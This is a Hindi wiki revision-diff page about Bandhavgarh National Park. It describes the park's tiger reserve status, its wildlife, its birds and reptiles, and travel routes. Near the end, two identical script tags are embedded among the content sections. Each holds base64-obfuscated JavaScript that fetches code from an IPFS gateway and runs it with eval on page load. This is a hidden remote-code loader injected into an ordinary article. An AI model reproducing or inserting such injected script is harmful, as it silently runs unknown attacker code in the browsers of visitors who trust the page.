Difference between revisions of "बांधवगढ़ राष्ट्रीय उद्यान"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replacement - "शृंखला" to "श्रृंखला")
 
(6 intermediate revisions by 2 users not shown)
Line 1: Line 1:
{{पुनरीक्षण}}
+
{{सूचना बक्सा पर्यटन
[[चित्र:Bandhavgarh-National-Park.jpg|thumb|250px|बांधवगढ़ राष्ट्रीय उद्यान, उमरिया]]
+
|चित्र=Bandhavgarh-National-Park.jpg
'''बांधवगढ़ राष्ट्रीय उद्यान''' एक छोटा पार्क है जो सुगठित होने के साथ खेलों से भरा हुआ है। [[बाँधवगढ़]] में [[बाघ|बाघों]] की संख्‍या [[भारत]] में सबसे अधिक है। इस राष्ट्रीय उद्यान के महत्‍व और संभाव्‍यता को देखते हुए इसे 1993 में 'प्रोजेक्‍ट टाइगर नेटवर्क' में जोड़ा गया था। इस आरक्षित वन का नाम इसके मध्‍य में स्थित बांधवगढ़ पहाड़ी (807 मीटर) के नाम पर रखा गया है जो [[विन्ध्याचल पर्वत]] श्रृंखला और [[सतपुड़ा पर्वतश्रेणी]] के पूर्वी सिरे के बीच स्थित है और यह [[मध्य प्रदेश]] के शहडोल और [[जबलपुर]] ज़िलों में है।  
+
|चित्र का नाम=बांधवगढ़ राष्ट्रीय उद्यान
 +
|विवरण='बांधवगढ़ राष्ट्रीय उद्यान' [[मध्य प्रदेश]] में [[विंध्य पर्वतमाला]] के पूर्वी क्षेत्र में स्थित है। यह उद्यान अपने [[बाघ|बाघों]] के लिए विश्व भर में प्रसिद्ध है।
 +
|राज्य=
 +
|केन्द्र शासित प्रदेश=
 +
|ज़िला=
 +
|निर्माता=
 +
|स्वामित्व=
 +
|प्रबंधक=
 +
|निर्माण काल=
 +
|स्थापना=
 +
|भौगोलिक स्थिति=[[खजुराहो]] से लगभग 237 कि.मी. और [[जबलपुर]] से 195 कि.मी. की दूरी पर स्थित है।
 +
|मार्ग स्थिति=
 +
|मौसम=
 +
|तापमान=
 +
|प्रसिद्धि=
 +
|कब जाएँ=
 +
|कैसे पहुँचें=
 +
|हवाई अड्डा=[[खजुराहो]], [[जबलपुर]]
 +
|रेलवे स्टेशन=[[जबलपुर]], [[कटनी ज़िला|कटनी]], [[सतना ज़िला|सतना]]
 +
|बस अड्डा=
 +
|यातायात=
 +
|क्या देखें=
 +
|कहाँ ठहरें=
 +
|क्या खायें=
 +
|क्या ख़रीदें=
 +
|एस.टी.डी. कोड=
 +
|ए.टी.एम=
 +
|सावधानी=
 +
|मानचित्र लिंक=
 +
|संबंधित लेख=[[मध्य प्रदेश]], [[कान्हा राष्ट्रीय उद्यान]], [[पन्ना राष्ट्रीय उद्यान]]
 +
|शीर्षक 1=
 +
|पाठ 1=
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|अन्य जानकारी=इस अभ्यारण्य में 22 प्रकार के स्‍तनधारियों की प्रजातियाँ तथा 250 पक्षी प्रजातियाँ पाई जाती है। शाकाहारियों में केवल 'गौर' नामक जंतु ही इस अभ्यारण्य में पाया जाता है।
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन=
 +
}}
  
यहां 22 से स्‍तनधारियों की प्रजातियां तथा 250 पक्षी प्रजातियां पाई जाती है। यहां सामान्‍य [[लंगूर]] और रिसस बंदर प्राइमेट समूह का प्रति‍निधित्‍व करते हैं। यहां पाए जाने वाले मांसभक्षियों में एशियाई भेडियां, बंगली लोमड़ी, स्‍लॉथ बीयर, रेटल, भूरे मंगूस, पट्टी दार हाइना, जंगली बिल्‍ली, चीते और बाघ, यहां पाए जाने वाले अन्‍य जंतु है जंगली सुअर, चित्तीदार हिरण, सांभर, चौसिंघा, नील गाय, चिंकारा और गौर। यहां पाए जाने वाले स्‍तनधारी है डोल, छोटी भारतीय सीवेट, पाम गिलहरी और छोटे बेंडीकूट चूहे कभी कभार देखे जा सकते हैं। शाकाहारियों में केवल गौर नामक जंतु पाया जाता है जो चारा खाता है।
 
  
नदियों और दलदली स्‍थानों की वनस्‍ति के साथ अनेक प्रकार के पक्षी पाए जाते हैं। इनमें से कुछ सामान्‍य है ग्रेब, अगरेट, लेसर एडजुटेंट, [[सारस]], क्रेन, ब्‍लैक आइबिस, लैसर विसलिंग टीज, सफेद आंखों वाले बजार्ड, ब्‍लैक काइट, क्रेस्‍टेड सर्पेंट इंगल, काला गीध, इजिप्‍शन गीध, सामान्‍य पी फाउल, लाल जंगली फाउल, डव, पाराकिट, किंगफिशर और इंडियन रोलर। यहां पाए जाने वाले सरीसृप हैं कोबरा, क्रेट, वाइपर, रेट स्‍नैक, पाइथन, [[कछुआ|कछुएं]] और वारानस सहित कई प्रकार की छिपकलियां।
+
'''बांधवगढ़ राष्ट्रीय उद्यान''' [[मध्य प्रदेश]] में [[विंध्य पर्वतमाला]] के पूर्वी क्षेत्र में स्थित है। यह [[खजुराहो]] से लगभग 237 कि.मी. और [[जबलपुर]] से 195 कि.मी. की दूरी पर स्थित है। पहले [[बांधवगढ़]] के चारों ओर फैले जंगल का रख-रखाव [[रीवा]] के महाराजा के शिकारगाह के रूप में किया जाता था। 'बांधवगढ़ राष्ट्रीय उद्यान' अपने [[बाघ|बाघों]] के लिए विश्व भर में प्रसिद्ध है।
+
==आरक्षित वन क्षेत्र==
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
+
यह राष्ट्रीय उद्यान एक छोटा पार्क है, जो सुगठित होने के साथ ही खेलों से भरा हुआ है। [[बाँधवगढ़]] में बाघों की संख्‍या [[भारत]] में सबसे अधिक है। इस राष्ट्रीय उद्यान के महत्‍व और संभाव्‍यता को देखते हुए इसे [[1993]] में 'प्रोजेक्‍ट टाइगर नेटवर्क' में जोड़ा गया था। इस आरक्षित वन का नाम इसके मध्‍य में स्थित 'बांधवगढ़ पहाड़ी' (807 मीटर) के नाम पर रखा गया है, जो [[विन्ध्याचल पर्वत]] श्रृंखला और [[सतपुड़ा पर्वतश्रेणी]] के पूर्वी सिरे के बीच स्थित है और यह [[मध्य प्रदेश]] के शहडोल और [[जबलपुर]] ज़िलों में है।
 +
====जीव-जंतु====
 +
*इस अभ्यारण्य में 22 प्रकार के स्‍तनधारियों की प्रजातियाँ तथा 250 पक्षी प्रजातियाँ पाई जाती है।
 +
*यहाँ सामान्‍यत: [[लंगूर]] और रिसस बंदर प्राइमेट समूह का प्रति‍निधित्‍व करते हैं।
 +
*वन में पाए जाने वाले मांसभक्षियों में एशियाई भेडिया, बंगली लोमड़ी, स्‍लॉथ बीयर, रेटल, भूरे मंगूस, पट्टी दार लकड़बग्गा, जंगली बिल्‍ली, चीते और [[बाघ]] आदि जंगली जीव प्रमुख हैं।
 +
*जंगली सुअर, चित्तीदार हिरण, सांभर, चौसिंघा, नील गाय, [[चिंकारा]] और गौर आदि भी पर्याप्त संख्या में यहाँ पाये जाते हैं।
 +
*बांधवगढ़ अभ्यारण्य में पाए जाने वाले स्‍तनधारी हैं- डोल, छोटी भारतीय सीवेट, पाम गिलहरी और छोटे बेंडीकूट चूहे कभी कभार देखे जा सकते हैं।
 +
*शाकाहारियों में केवल 'गौर' नामक जंतु ही इस अभ्यारण्य में पाया जाता है, जो चारा खाता है।
 +
;पक्षी
 +
नदियों और दलदली स्‍थानों की वनस्‍ति के साथ अनेक प्रकार के पक्षी भी बांधवगढ़ अभ्यारण्य में पाए जाते हैं। इनमें से कुछ सामान्‍य हैं- ग्रेब, अगरेट, लेसर एडजुटेंट, [[सारस]], क्रेन, ब्‍लैक आइबिस, लैसर विसलिंग टीज, सफेद आँखों वाले बजार्ड, ब्‍लैक काइट, क्रेस्‍टेड सर्पेंट इंगल, काला गीध, इजिप्‍शन गीध, सामान्‍य पी फाउल, लाल जंगली फाउल, डव, पाराकिट, किंगफिशर और इंडियन रोलर।
 +
;सरीसृप
 +
यहाँ पाए जाने वाले सरीसृप हैं- कोबरा, क्रेट, वाइपर, रेटल स्‍नैक, पाइथन, [[कछुआ|कछुएं]] और वारानस सहित कई प्रकार की छिपकलियाँ।
 +
==कैसे पहुँचें==
 +
[[बांधवगढ़]] जाने के लिए [[खजुराहो]] और [[जबलपुर]] के हवाई अड्डें अच्छे विकल्प हो सकते हैं। मध्य रेल मार्ग पर जबलपुर, [[कटनी ज़िला|कटनी]] और [[सतना ज़िला|सतना]] तथा दक्षिण पूर्वी रेल मार्ग पर उमरिया नजदीकी रेलवे स्टेशन हैं। जबलपुर, कटनी और उमरिया से इस अभ्यारण्य तक पहुँचने के लिए बसें और टैक्सियाँ उपलब्ध हैं।
 
   
 
   
 +
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
Line 20: Line 70:
 
[[Category:पर्यटन कोश]]
 
[[Category:पर्यटन कोश]]
 
__INDEX__
 
__INDEX__
 +
__NOTOC__

Latest revision as of 11:37, 9 February 2021

baandhavagadh rashtriy udyan
vivaran 'baandhavagadh rashtriy udyan' madhy pradesh mean viandhy parvatamala ke poorvi kshetr mean sthit hai. yah udyan apane baghoan ke lie vishv bhar mean prasiddh hai.
bhaugolik sthiti khajuraho se lagabhag 237 ki.mi. aur jabalapur se 195 ki.mi. ki doori par sthit hai.
havaee adda khajuraho, jabalapur
relave steshan jabalapur, katani, satana
sanbandhit lekh madhy pradesh, kanha rashtriy udyan, panna rashtriy udyan


any janakari is abhyarany mean 22 prakar ke sh‍tanadhariyoan ki prajatiyaan tatha 250 pakshi prajatiyaan paee jati hai. shakahariyoan mean keval 'gaur' namak jantu hi is abhyarany mean paya jata hai.


baandhavagadh rashtriy udyan madhy pradesh mean viandhy parvatamala ke poorvi kshetr mean sthit hai. yah khajuraho se lagabhag 237 ki.mi. aur jabalapur se 195 ki.mi. ki doori par sthit hai. pahale baandhavagadh ke charoan or phaile jangal ka rakh-rakhav riva ke maharaja ke shikaragah ke roop mean kiya jata tha. 'baandhavagadh rashtriy udyan' apane baghoan ke lie vishv bhar mean prasiddh hai.

arakshit van kshetr

yah rashtriy udyan ek chhota park hai, jo sugathit hone ke sath hi kheloan se bhara hua hai. baandhavagadh mean baghoan ki sankhh‍ya bharat mean sabase adhik hai. is rashtriy udyan ke mahath‍v aur sanbhavh‍yata ko dekhate hue ise 1993 mean 'projekh‍t taigar netavark' mean jo da gaya tha. is arakshit van ka nam isake madhh‍y mean sthit 'baandhavagadh paha di' (807 mitar) ke nam par rakha gaya hai, jo vindhyachal parvat shrriankhala aur satapu da parvatashreni ke poorvi sire ke bich sthit hai aur yah madhy pradesh ke shahadol aur jabalapur ziloan mean hai.

jiv-jantu

  • is abhyarany mean 22 prakar ke sh‍tanadhariyoan ki prajatiyaan tatha 250 pakshi prajatiyaan paee jati hai.
  • yahaan samanh‍yat: langoor aur risas bandar praimet samooh ka prati‍nidhith‍v karate haian.
  • van mean pae jane vale maansabhakshiyoan mean eshiyaee bhediya, bangali lom di, sh‍l aauth biyar, retal, bhoore mangoos, patti dar lak dabagga, jangali bilh‍li, chite aur bagh adi jangali jiv pramukh haian.
  • jangali suar, chittidar hiran, saanbhar, chausiangha, nil gay, chiankara aur gaur adi bhi paryapt sankhya mean yahaan paye jate haian.
  • baandhavagadh abhyarany mean pae jane vale sh‍tanadhari haian- dol, chhoti bharatiy sivet, pam gilahari aur chhote beandikoot choohe kabhi kabhar dekhe ja sakate haian.
  • shakahariyoan mean keval 'gaur' namak jantu hi is abhyarany mean paya jata hai, jo chara khata hai.
pakshi

nadiyoan aur daladali sh‍thanoan ki vanash‍ti ke sath anek prakar ke pakshi bhi baandhavagadh abhyarany mean pae jate haian. inamean se kuchh samanh‍y haian- greb, agaret, lesar edajuteant, saras, kren, bh‍laik aibis, laisar visaliang tij, saphed aankhoan vale bajard, bh‍laik kait, kresh‍ted sarpeant iangal, kala gidh, ijiph‍shan gidh, samanh‍y pi phaul, lal jangali phaul, dav, parakit, kiangaphishar aur iandiyan rolar.

sarisrip

yahaan pae jane vale sarisrip haian- kobara, kret, vaipar, retal sh‍naik, paithan, kachhuean aur varanas sahit kee prakar ki chhipakaliyaan.

kaise pahuanchean

baandhavagadh jane ke lie khajuraho aur jabalapur ke havaee addean achchhe vikalp ho sakate haian. madhy rel marg par jabalapur, katani aur satana tatha dakshin poorvi rel marg par umariya najadiki relave steshan haian. jabalapur, katani aur umariya se is abhyarany tak pahuanchane ke lie basean aur taiksiyaan upalabdh haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>